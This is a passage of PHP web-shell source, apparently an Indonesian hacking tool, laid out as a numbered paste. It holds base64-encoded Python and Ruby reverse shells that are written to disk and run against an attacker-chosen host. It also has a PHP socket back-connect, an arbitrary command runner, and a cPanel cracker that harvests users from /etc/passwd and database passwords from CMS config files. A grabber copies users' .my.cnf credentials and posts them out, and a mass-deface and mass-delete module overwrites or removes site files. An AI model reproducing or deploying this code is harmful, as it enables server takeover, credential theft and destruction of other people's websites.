  1643. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==");
  1644. $pbcaa=@fopen('bcpyt.py','w');
  1645. fwrite($pbcaa,$becaa);
  1646. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  1647. sleep(1);
  1648. echo "<pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre>";
  1649. unlink("bcpyt.py");
  1650. }
  1651. if($_POST['backconnect'] == 'ruby') {
  1652. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  1653. $pbcaak=@fopen('bcruby.rb','w');
  1654. fwrite($pbcaak,$becaak);
  1655. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  1656. sleep(1);
  1657. echo "<pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre>";
  1658. unlink("bcruby.rb");
  1659. }
  1660. if($_POST['backconnect'] == 'php') {
  1661.             $ip = $_POST['server'];
  1662.             $port = $_POST['port'];
  1663.             $sockfd = fsockopen($ip , $port , $errno, $errstr );
  1664.             if($errno != 0){
  1665.               echo "<font color='red'>$errno : $errstr</font>";
  1666.             } else if (!$sockfd)  {
  1667.               $result = "<p>Unexpected error has occured, connection may have failed.</p>";
  1668.             } else {
  1669.               fputs ($sockfd ,"
  1670.                 \n{################################################################}
  1671.                 \n..:: BackConnect Php By Con7ext ::..
  1672.                 \n{################################################################}\n");
  1673.               $dir = shell_exec("pwd");
  1674.               $sysinfo = shell_exec("uname -a");
  1675.               $time = Shell_exec("time");
  1676.               $len = 1337;
  1677.               fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  1678.               while(!feof($sockfd)){ $cmdPrompt = '[Con7ext]#:> ';
  1679.               fputs ($sockfd , $cmdPrompt );
  1680.               $command= fgets($sockfd, $len);
  1681.               fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  1682.             }
  1683.             fclose($sockfd);
  1684.             }
  1685.           }
  1686.         echo "</p></div>";
  1687. } elseif($_GET['jancok'] == 'adminer') {
  1688.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1689.     function adminer($url, $isi) {
  1690.         $fp = fopen($isi, "w");
  1691.         $ch = curl_init();
  1692.               curl_setopt($ch, CURLOPT_URL, $url);
  1693.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1694.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1695.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1696.               curl_setopt($ch, CURLOPT_FILE, $fp);
  1697.         return curl_exec($ch);
  1698.               curl_close($ch);
  1699.         fclose($fp);
  1700.         ob_flush();
  1701.         flush();
  1702.     }
  1703.     if(file_exists('adminer.php')) {
  1704.         echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1705.     } else {
  1706.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1707.             echo "<center><font color=white><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1708.         } else {
  1709.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  1710.         }
  1711.     }
  1712. }
  1713.  elseif($_GET['jancok'] == 'cpbf') {
  1714.     if($_POST['crack']) {
  1715.         $usercp = explode("\r\n", $_POST['user_cp']);
  1716.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1717.         $i = 0;
  1718.         foreach($usercp as $ucp) {
  1719.             foreach($passcp as $pcp) {
  1720.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1721.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1722.                     } else {
  1723.                         $_SESSION[$ucp] = "1";
  1724.                         $_SESSION[$pcp] = "1";
  1725.                         $i++;
  1726.                         echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  1727.                     }
  1728.                 }
  1729.             }
  1730.         }
  1731.         if($i == 0) {
  1732.         } else {
  1733.             echo "<br>Nemu ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69</font>";
  1734.         }
  1735.     } else {
  1736.         echo "<center>
  1737.         <form method='post'>
  1738.         USER: <br>
  1739.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1740.         $_usercp = fopen("/etc/passwd","r");
  1741.         while($getu = fgets($_usercp)) {
  1742.             if($getu == '' || !$_usercp) {
  1743.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1744.             } else {
  1745.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1746.                 foreach($u[1] as $user_cp) {
  1747.                         if(is_dir("/home/$user_cp/public_html")) {
  1748.                             echo "$user_cp\n";
  1749.                     }
  1750.                 }
  1751.             }
  1752.         }
  1753.         echo "</textarea><br>
  1754.         PASS: <br>
  1755.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1756.         function cp_pass($dir) {
  1757.             $pass = "";
  1758.             $dira = scandir($dir);
  1759.             foreach($dira as $dirb) {
  1760.                 if(!is_file("$dir/$dirb")) continue;
  1761.                 $ambil = file_get_contents("$dir/$dirb");
  1762.                 if(preg_match("/WordPress/", $ambil)) {
  1763.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1764.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1765.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1766.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1767.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1768.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1769.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1770.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1771.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1772.                 } elseif(preg_match("/client/", $ambil)) {
  1773.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1774.                     if(preg_match('/"/', $pass1[1])) {
  1775.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1776.                         $pass .= $pass1[1]."\n";
  1777.                     }
  1778.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1779.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1780.                 }
  1781.             }
  1782.             echo $pass;
  1783.         }
  1784.         $cp_pass = cp_pass($dir);
  1785.         echo $cp_pass;
  1786.         echo "</textarea><br>
  1787.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  1788.         </form>
  1789.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1790.     }
  1791. }elseif($_GET['jancok'] == 'cmd') {
  1792. echo "<center><form method='post'>
  1793.     <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).": ~ $ </font>
  1794.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  1795.     </form>";
  1796.     if($_POST['do_cmd']) {
  1797.         echo "<pre><textarea>".exe($_POST['cmd'])."</textarea></pre>";
  1798.     }
  1799. }
  1800. elseif($_GET['jancok'] == 'cpanel') {
  1801. @ini_set('display_errors',0);
  1802. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1803.     $ar0=explode($marqueurDebutLien, $text);
  1804.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  1805.     return trim($ar1[0]);
  1806. }
  1807. echo '<br><br><style>
  1808. textarea {
  1809. resize:none;
  1810. color:black;
  1811. background-color:#ffffff;  
  1812. font-size:8pt; color:black;
  1813. border:1px solid white ;
  1814. border-left: 4px solid white ;
  1815. }
  1816. input {
  1817. color: black;
  1818. border:1px dotted white;
  1819. }
  1820. </style>';
  1821. echo '<center>';
  1822. $d0mains = @file('/etc/named.conf');
  1823. $domains = scandir("/var/named");
  1824. if ($domains or $d0mains)
  1825. {
  1826.     $domains = scandir("/var/named");
  1827.     if($domains) {
  1828. echo "<table align=center><tr><th valign=top  class=style2> COUNT </th><th valign=top > DOMAIN </th><th valign=top class=style2 > USER </th><th valign=top class=style2 > Password </th><th valign=top class=style2 > .my.cnf </th></tr>";
  1829. $count=1;
  1830. $dc = 0;
  1831. $list = scandir("/var/named");
  1832. foreach($list as $domain){
  1833. if(strpos($domain,".db")){
  1834. $domain = str_replace('.db','',$domain);
  1835. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1836. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1837. $path = getcwd();
  1838. if (is_readable($dirz)) {
  1839. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1840. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1841. $password=entre2v2($p,'password="','"');
  1842. echo "<tr><td valign=top style=border :2px solid white; width: 139px class=style2>".$count++."</td><td valign=top style= width: 139px; border :2px solid white  class=style2 ><a href=http://".$domain.":2082 target=_blank>".$domain."</a></td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$owner['name']."</td><td valign=top style= width: 139px; border: 2px solid white  class=style2 >".$password."</td><td valign=top style=border :2px solid white style=width: 139px><a href=".$owner['name'].".txt target=_blank>Click Here</a></td></tr>";
  1843. $dc++;
  1844. $success3="http://".$domain."|".$owner['name']."|".$password."\n";
  1845. $ch = curl_init();
  1846. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  1847. curl_setopt($ch, CURLOPT_POST, 1);
  1848. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success3));
  1849. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1850. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  1851. curl_setopt($ch, CURLOPT_HEADER, 1);
  1852. $buffer = curl_exec($ch);
  1853. }
  1854. }
  1855. }
  1856. echo '</table>';
  1857. $total = $dc;
  1858.  
  1859. echo '</center>';
  1860. }else{
  1861. $d0mains = @file('/etc/named.conf');
  1862.     if($d0mains) {
  1863. echo "<table align=center><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1864. $count=1;
  1865. $dc = 0;
  1866. $mck = array();
  1867. foreach($d0mains as $d0main){
  1868.     if(@eregi('zone',$d0main)){
  1869.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1870.         flush();
  1871.         if(strlen(trim($domain[1][0])) >2){
  1872.             $mck[] = $domain[1][0];
  1873.         }
  1874.     }
  1875. }
  1876. $mck = array_unique($mck);
  1877. $usr = array();
  1878. $dmn = array();
  1879. foreach($mck as $o) {
  1880.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1881.     $usr[] = $infos['name'];
  1882.     $dmn[] = $o;
  1883. }
  1884. array_multisort($usr,$dmn);
  1885. $dt = file('/etc/passwd');
  1886. $passwd = array();
  1887. foreach($dt as $d) {
  1888.     $r = explode(':',$d);
  1889.     if(strpos($r[5],'home')) {
  1890.         $passwd[$r[0]] = $r[5];
  1891.     }
  1892. }
  1893. $l=0;
  1894. $j=1;
  1895. foreach($usr as $r) {
  1896. $dirz = '/home/'.$r.'/.my.cnf';
  1897. $path = getcwd();
  1898. if (is_readable($dirz)) {
  1899. copy($dirz, ''.$path.'/'.$r.'.txt');
  1900. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1901. $password=entre2v2($p,'password="','"');
  1902. echo "<tr><td valign=top class=style2 style=width: 139px>".$count++."</td><td valign=top class=style2 style=width: 139px><a target=_blank href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td valign=top class=style2 style=width: 139px>'.$r."</td><td valign=top class=style2 style=width: 139px>".$password."</td><td valign=top class=style2 style=width: 139px><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1903. $dc++;
  1904.                 flush();
  1905.                 $l=$l?0:1;
  1906.                 $j++;
  1907.                 }
  1908.             }
  1909.             }
  1910. echo '</table>';
  1911. $total = $dc;
  1912. echo '<br><div class=result valign=top class=style2 style=width: 139px >Total cPanel Found = '.$total.'</h3><br />';
  1913. echo '</center>';
  1914. }
  1915.  
  1916. }else{
  1917. echo "<div class=result><i><font color=#FF0000>ERROR</font><br><font color=#FF0000>/var/named</font> or <font color=#FF0000>etc/named.conf</font> Not Accessible!</i></div>";
  1918. }
  1919. } elseif($_GET['jancok'] == 'mass_deface') {
  1920.     echo "<center><form action=\"\" method=\"post\">\n";
  1921.     $dirr=$_POST['d_dir'];
  1922.     $index = $_POST["script"];
  1923.     $index = str_replace('"',"'",$index);
  1924.     $index = stripslashes($index);
  1925.     function edit_file($file,$index){
  1926.         if (is_writable($file)) {
  1927.         clear_fill($file,$index);
  1928.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1929.         }
  1930.         else {
  1931.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1932.             }
  1933.             }
  1934.     function hapus_massal($dir,$namafile) {
  1935.         if(is_writable($dir)) {
  1936.             $dira = scandir($dir);
  1937.             foreach($dira as $dirb) {
  1938.                 $dirc = "$dir/$dirb";
  1939.                 $lokasi = $dirc.'/'.$namafile;
  1940.                 if($dirb === '.') {
  1941.                     if(file_exists("$dir/$namafile")) {
  1942.                         unlink("$dir/$namafile");
  1943.                     }
  1944.                 } elseif($dirb === '..') {
  1945.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1946.                         unlink("".dirname($dir)."/$namafile");
  1947.                     }
  1948.                 } else {
  1949.                     if(is_dir($dirc)) {
  1950.                         if(is_writable($dirc)) {
  1951.                             if(file_exists($lokasi)) {
  1952.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1953.                                 unlink($lokasi);
  1954.                                 $idx = hapus_massal($dirc,$namafile);
  1955.                             }
  1956.                         }
  1957.                     }
  1958.                 }
  1959.             }
  1960.         }
  1961.     }
  1962.     function clear_fill($file,$index){
  1963.         if(file_exists($file)){
  1964.             $handle = fopen($file,'w');
  1965.             fwrite($handle,'');
  1966.             fwrite($handle,$index);
  1967.             fclose($handle);  } }
  1968.  
  1969.     function gass(){
  1970.         global $dirr , $index ;
  1971.         chdir($dirr);
  1972.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1973.         $files = scandir($dirr) ;
  1974.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1975.         sort($files);
  1976.         $n = 0 ;
  1977.         foreach ($files as $file){
  1978.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1979.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1980.                 edit_file($file,$index);
  1981.                 flush();
  1982.                 $n = $n +1 ;
  1983.                 }
  1984.                 }
  1985.                 echo "<br>";
  1986.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  1987.                     }
  1988.     function ListFiles($dirrall) {
  1989.  
  1990.     if($dh = opendir($dirrall)) {
  1991.  
  1992.        $files = Array();
  1993.        $inner_files = Array();
  1994.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1995.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1996.         while($file = readdir($dh)) {
  1997.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1998.                 if(is_dir($dirrall . "/" . $file)) {
  1999.                     $inner_files = ListFiles($dirrall . "/" . $file);
  2000.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  2001.                 } else {
  2002.                     array_push($files, $dirrall . "/" . $file);
  2003.                 }
  2004.             }
  2005.             }
  2006.  
  2007.             closedir($dh);
  2008.             return $files;
  2009.         }
  2010.     }
  2011.     function gass_all(){
  2012.         global $index ;
  2013.         $dirrall=$_POST['d_dir'];
  2014.         foreach (ListFiles($dirrall) as $key=>$file){
  2015.             $file = str_replace('//',"/",$file);
  2016.             echo "<center><strong>$file</strong> ===>";
  2017.             edit_file($file,$index);
  2018.             flush();
  2019.         }
  2020.         $key = $key+1;
  2021.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  2022.     function sabun_massal($dir,$namafile,$isi_script) {
  2023.         if(is_writable($dir)) {
  2024.             $dira = scandir($dir);
  2025.             foreach($dira as $dirb) {
  2026.                 $dirc = "$dir/$dirb";
  2027.                 $lokasi = $dirc.'/'.$namafile;
  2028.                 if($dirb === '.') {
  2029.                     file_put_contents($lokasi, $isi_script);
  2030.                 } elseif($dirb === '..') {
  2031.                     file_put_contents($lokasi, $isi_script);
  2032.                 } else {
  2033.                     if(is_dir($dirc)) {
  2034.                         if(is_writable($dirc)) {
  2035.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  2036.                             file_put_contents($lokasi, $isi_script);
  2037.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  2038.                         }
  2039.                     }
  2040.                 }
  2041.             }
  2042.         }
  2043.     }
  2044.     if($_POST['mass'] == 'onedir') {
  2045.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  2046.         $ini="http://";
  2047.         $mainpath=$_POST[d_dir];
  2048.         $file=$_POST[d_file];
  2049.         $dir=opendir("$mainpath");
  2050.         $code=base64_encode($_POST[script]);
  2051.         $indx=base64_decode($code);
  2052.         while($row=readdir($dir)){
  2053.         $start=@fopen("$row/$file","w+");
  2054.         $finish=@fwrite($start,$indx);
  2055.         if ($finish){
  2056.             echo"$ini$row/$file\n";
  2057.             }
  2058.         }
  2059.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  2060.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  2061.         $dir=opendir("$mainpath");
  2062.         $code=base64_encode($_POST[script]);
  2063.         $indx=base64_decode($code);
  2064.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  2065.         $finish=@fwrite($start,$indx);
  2066.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  2067.         }
  2068.  
  2069.     }
  2070.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  2071.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  2072.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  2073.     elseif($_POST['mass'] == 'massdeface') {
  2074.         echo "<div style='margin: 5px auto; padding: 5px'>";
  2075.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  2076.         echo "</div>";  }
  2077.     else {
  2078.         echo "
  2079.         <center><font style='text-decoration: underline;'>
  2080.         Select Type:<br>
  2081.         </font>
  2082.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  2083.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  2084.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  2085.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  2086.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  2087.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  2088.         <font style='text-decoration: underline;'>Folder:</font><br>
  2089.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  2090.         <font style='text-decoration: underline;'>Filename:</font><br>
  2091.         <input type='text' name='d_file' value='readthis.html' style='width: 450px;' height='10'><br>
  2092.         <font style='text-decoration: underline;'>Index File:</font><br>
  2093.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  2094.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  2095.         </form></center>";
  2096.         }
  2097. }elseif($_GET['mass'] == 'changer') {
